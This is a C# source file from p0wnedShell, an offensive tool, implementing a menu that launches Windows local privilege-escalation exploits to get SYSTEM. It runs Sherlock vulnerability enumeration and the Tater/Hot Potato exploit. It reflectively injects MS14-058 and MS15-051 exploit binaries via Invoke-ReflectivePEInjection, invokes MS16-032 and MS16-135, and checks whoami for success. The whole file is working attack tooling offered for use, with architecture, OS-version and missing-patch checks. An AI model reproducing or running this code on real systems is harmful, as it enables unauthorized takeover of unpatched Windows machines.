﻿using System;
using System.Globalization;

namespace p0wnedShell
{
    class Exploits
    {
        private static P0wnedListenerConsole P0wnedListener = new P0wnedListenerConsole();

        public static void PowerBanner()
        {
            string[] toPrint = { "* Get SYSTEM Privileges using various Exploits/Vulnerabilities.     *" };
            Program.PrintBanner(toPrint);
        }

        public static void Menu()
        {
            PowerBanner();
            Console.WriteLine(" 1. Use Sherlock to find Local Privilege Escalation Vulnerabilities.");
            Console.WriteLine();
            Console.WriteLine(" 2. Tater \"The Posh Hot Potato\" Windows Privilege Escalation exploit.");
            Console.WriteLine();
            Console.WriteLine(" 3. Get SYSTEM using the MS14-058 TrackPopupMenu Win32k NULL Pointer Dereference Exploit.");
            Console.WriteLine();
            Console.WriteLine(" 4. Get SYSTEM using the MS15-051 Windows ClientCopyImage Win32k Exploit.");
            Console.WriteLine();
            Console.WriteLine(" 5. Get SYSTEM using the MS16-032 Leaked Thread Handle Exploit.");
            Console.WriteLine();
            Console.WriteLine(" 6. Get SYSTEM using the MS16-135 Win32k.sys NtSetWindowLongPtr Exploit.");
            Console.WriteLine();
            Console.WriteLine(" 7. Back.");
            Console.Write("\nEnter choice: ");

            int userInput = 0;
            while (true)
            {
                try
                {
                    userInput = Convert.ToInt32(Console.ReadLine());
                    if (userInput < 1 || userInput > 7)
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("\n[+] Wrong choice, please try again!\n");
                        Console.ResetColor();
                        Console.Write("Enter choice: ");
                    }
                    else
                    {
                        break;
                    }
                }
                catch
                {
                    Console.ForegroundColor = ConsoleColor.Red;
                    Console.WriteLine("\n[+] Wrong choice, please try again!\n");
                    Console.ResetColor();
                    Console.Write("Enter choice: ");
                }
            }

            switch (userInput)
            {
                case 1:
                    Sherlock();
                    break;
                case 2:
                    Potato.TaterMenu();
                    break;
                case 3:
                    MS14_058();
                    break;
                case 4:
                    MS15_051();
                    break;
                case 5:
                    MS16_032();
                    break;
                case 6:
                    MS16_135();
                    break;
                default:
                    break;
            }
        }

        public static void Sherlock()
        {
            string[] toPrint = { "* Use Sherlock to find Local Privilege Escalation Vulnerabilities.  *" };

            Program.PrintBanner(toPrint);

            Console.WriteLine("[+] Please wait while Sherlock is enumerating...");

            string Sherlock = "Find-AllVulns";
            try
            {
                P0wnedListener.Execute(Sherlock);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
            Console.WriteLine("Press Enter to Continue...");
            Console.ReadLine();
            return;
        }

        public static void MS14_058()
        {
            string[] toPrint = { "* Get into Ring0 using the MS14-058 Vulnerability.                  *" };

            Program.PrintBanner(toPrint);

            string osArch = "x86";
            if (Pshell.EnvironmentHelper.Is64BitOperatingSystem())
            {
                osArch = "x64";
            }

            string procArch = "x86";
            if (Pshell.EnvironmentHelper.Is64BitProcess())
            {
                procArch = "x64";
            }

            //detect if the correct architecture is being used
            if (procArch != osArch)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Your OS Architectecture does not match the version of p0wnedShell you run.");
                Console.WriteLine("[+] To run this Exploit, you should run the " + osArch + " version of p0wnedShell\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            OperatingSystem OS = System.Environment.OSVersion;
            string LatestOSVersion = "6.3";
            decimal latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture);
            if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] MS14-058 is only exploitable on Windows 8.1/2012 R2 or lower.\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine("This Exploit can only succeed when patch KB3000061 is not installed on this system.\n");
            Console.ResetColor();
            Console.Write("[+] Please wait until loaded...\n");
            Console.WriteLine();

            string MS14_058 = "Invoke-ReflectivePEInjection -PEBytes (\"" + Binaries.MS14_058(osArch) + "\" -split ' ') -ExeArgs \"whoami.exe\" -Verbose";
            try
            {
                P0wnedListener.Execute(MS14_058);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            string Whoami = "whoami";
            string SystemPower = null;
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("\n[+] let's check if our exploit succeeded:\n");
            Console.ResetColor();
            try
            {
                SystemPower = Pshell.RunPSCommand(Whoami);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
            if (SystemPower.IndexOf("system", 0, StringComparison.OrdinalIgnoreCase) != -1)
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("[+] The Ring has awoken, it’s heard its masters call :)\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue and Get The Party Started...");
                Console.ReadLine();
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Exploit failed, System probably already patched!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
            }
            return;
        }


        public static void MS15_051()
        {
            string[] toPrint = { "* Get into Ring0 using the MS15-051 Vulnerability.                  *" };

            Program.PrintBanner(toPrint);

            string osArch = "x86";
            if (Pshell.EnvironmentHelper.Is64BitOperatingSystem())
            {
                osArch = "x64";
            }

            string procArch = "x86";
            if (Pshell.EnvironmentHelper.Is64BitProcess())
            {
                procArch = "x64";
            }

            //detect if the correct architecture is being used
            if (procArch != osArch)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Your OS Architectecture does not match the version of p0wnedShell you run.");
                Console.WriteLine("[+] To run this Exploit, you should run the " + osArch + " version of p0wnedShell\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            OperatingSystem OS = System.Environment.OSVersion;
            string LatestOSVersion = "6.3";
            decimal latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture);
            if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] MS15-051 is only exploitable on Windows 8.1/2012 R2 or lower.\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine("This Exploit can only succeed when patch KB3045171 is not installed on this system.\n");
            Console.ResetColor();
            Console.Write("[+] Please wait until loaded...\n");
            Console.WriteLine();

            string MS15_051 = "Invoke-ReflectivePEInjection -PEBytes (\"" + Binaries.MS15_051(osArch) + "\" -split ' ') -Verbose";
            try
            {
                P0wnedListener.Execute(MS15_051);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            string Whoami = "whoami";
            string SystemPower = null;
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("\n[+] let's check if our exploit succeeded:\n");
            Console.ResetColor();
            try
            {
                SystemPower = Pshell.RunPSCommand(Whoami);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
            if (SystemPower.IndexOf("system", 0, StringComparison.OrdinalIgnoreCase) != -1)
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("[+] The Ring has awoken, it’s heard its masters call :)\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue and Get The Party Started...");
                Console.ReadLine();
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Exploit failed, System probably already patched!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
            }
            return;
        }

        public static void MS16_032()
        {
            string[] toPrint = { "* Exploiting a Leaked Thread Handle using the pOsh version of the   *",
                                 "* MS16-032 exploit By @tiraniddo and @FuzzySec                      *" };

            Program.PrintBanner(toPrint);

            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine("Notes by @FuzzySec:");
            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine();
            Console.WriteLine("* In order for the race condition to succeed the machine must have 2+ CPU");
            Console.WriteLine("  cores. If testing in a VM just make sure to add a core if needed mkay.");
            Console.WriteLine("* The exploit is pretty reliable, however ~1/6 times it will say it succeeded");
            Console.WriteLine("  but not spawn a shell. Not sure what the issue is but just re-run and profit!");
            Console.WriteLine("* Want to know more about MS16-032 ==>");
            Console.WriteLine("  https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html\n");
            Console.ResetColor();

            string MS16_032 = "Invoke-MS16-032";
            try
            {
                P0wnedListener.Execute(MS16_032);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine("\n[+] If succeeded this exploit should popup a System CMD Shell");
            Console.WriteLine("[+] If not... Try again, or accept that the System is already patched.\n");
            Console.ResetColor();
            Console.WriteLine("Press Enter to Continue...");
            Console.ReadLine();

            return;
        }

        public static void MS16_135()
        {
            string[] toPrint = { "* Exploiting win32k.sys NtSetWindowLongPtr (CVE-2016-7255)          *",
                                 "* MS16-135 exploit By @TinySecEx and @FuzzySec                      *" };

            Program.PrintBanner(toPrint);

            string osArch = "x86";
            if (Pshell.EnvironmentHelper.Is64BitOperatingSystem())
            {
                osArch = "x64";
            }

            string procArch = "x86";
            if (Pshell.EnvironmentHelper.Is64BitProcess())
            {
                procArch = "x64";
            }

            //detect if the correct architecture is being used
            if (procArch != osArch)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Your OS Architectecture does not match the version of p0wnedShell you run.");
                Console.WriteLine("[+] To run this Exploit, you should run the " + osArch + " version of p0wnedShell\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            string MS16_135 = "Invoke-MS16-135";
            try
            {
                P0wnedListener.Execute(MS16_135);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            string Whoami = "whoami";
            string SystemPower = null;
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("\n[+] let's check if our exploit succeeded:\n");
            Console.ResetColor();
            try
            {
                SystemPower = Pshell.RunPSCommand(Whoami);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
            if (SystemPower.IndexOf("system", 0, StringComparison.OrdinalIgnoreCase) != -1)
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("[+] The Ring has awoken, it’s heard its masters call :)\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue and Get The Party Started...");
                Console.ReadLine();
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Exploit failed, System probably already patched!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
            }
            return;
        }

    }
}